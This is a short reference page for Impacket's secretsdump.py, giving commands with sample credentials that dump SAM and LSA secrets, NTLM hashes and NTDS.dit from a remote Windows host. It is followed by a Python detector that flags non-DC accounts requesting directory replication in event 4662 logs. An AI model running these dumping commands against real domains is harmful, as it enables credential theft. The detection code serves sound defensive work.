Impacket’s secretsdump.py uses several techniques to dump secrets from a remote machine without executing an agent on it. These include reading SAM and LSA secrets from the registry, dumping NTLM hashes, plaintext credentials and Kerberos keys, and dumping NTDS.dit. The following command attempts to dump all secrets from the target machine using these techniques.
Command Reference:
Target IP: 10.10.10.1
Domain: test.local
Username: test
Password: Welkom01!
Command:
python3 secretsdump.py test.local/test:Welkom01!@10.10.10.1
Other command:
python3 secretsdump.py -just-dc-ntlm <DOMAIN>/<USER>@<DOMAIN_CONTROLLER>
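
A defender-side check for the NTDS.dit dump described above, as an added example that is not part of the original page or of Impacket. By default secretsdump.py retrieves NTDS.dit secrets through directory replication (DRSUAPI), which a domain controller records as Security event 4662 with replication-right GUIDs when Directory Service Access auditing is enabled. The JSON field layout, the DC account names DC01$ and DC02$, and the sample events are constructed assumptions.

```python
import json

# Control-access-right GUIDs that appear in the Properties field of Security
# event 4662 when directory replication is requested.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Assumption: inventory of domain controller machine accounts (hypothetical names).
KNOWN_DCS = {"DC01$", "DC02$"}

# Constructed sample events, one JSON object per line (field names are assumed).
SAMPLE_EVENTS = """\
{"EventID": 4662, "Computer": "DC01.test.local", "SubjectUserName": "DC02$", "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"}
{"EventID": 4662, "Computer": "DC01.test.local", "SubjectUserName": "test", "Properties": "{1131F6AD-9C07-11D1-F79F-00C04FC2DCD2}"}
{"EventID": 4662, "Computer": "DC01.test.local", "SubjectUserName": "test", "Properties": "{bf967aba-0de6-11d0-a285-00aa003049e2}"}
{"EventID": 4624, "Computer": "DC01.test.local", "SubjectUserName": "test", "Properties": ""}
not-json garbage line
"""

def find_replication_requests(lines, known_dcs=KNOWN_DCS):
    """Return alerts for 4662 events where a non-DC account used a replication right."""
    alerts = []
    allowed = {name.lower() for name in known_dcs}
    for line in lines:
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip malformed export lines rather than abort the run
        if not isinstance(event, dict) or event.get("EventID") != 4662:
            continue
        # GUID case varies between exports, so compare in lower case.
        props = str(event.get("Properties", "")).lower()
        rights = sorted(name for guid, name in REPLICATION_RIGHTS.items() if guid in props)
        account = str(event.get("SubjectUserName", ""))
        # Replication between domain controllers is expected; anything else is flagged.
        if rights and account.lower() not in allowed:
            alerts.append({"account": account, "dc": event.get("Computer"), "rights": rights})
    return alerts

if __name__ == "__main__":
    for alert in find_replication_requests(SAMPLE_EVENTS.splitlines()):
        print(alert)
```

Accounts that legitimately replicate the directory, such as directory synchronization service accounts, belong in the allow list alongside the domain controllers.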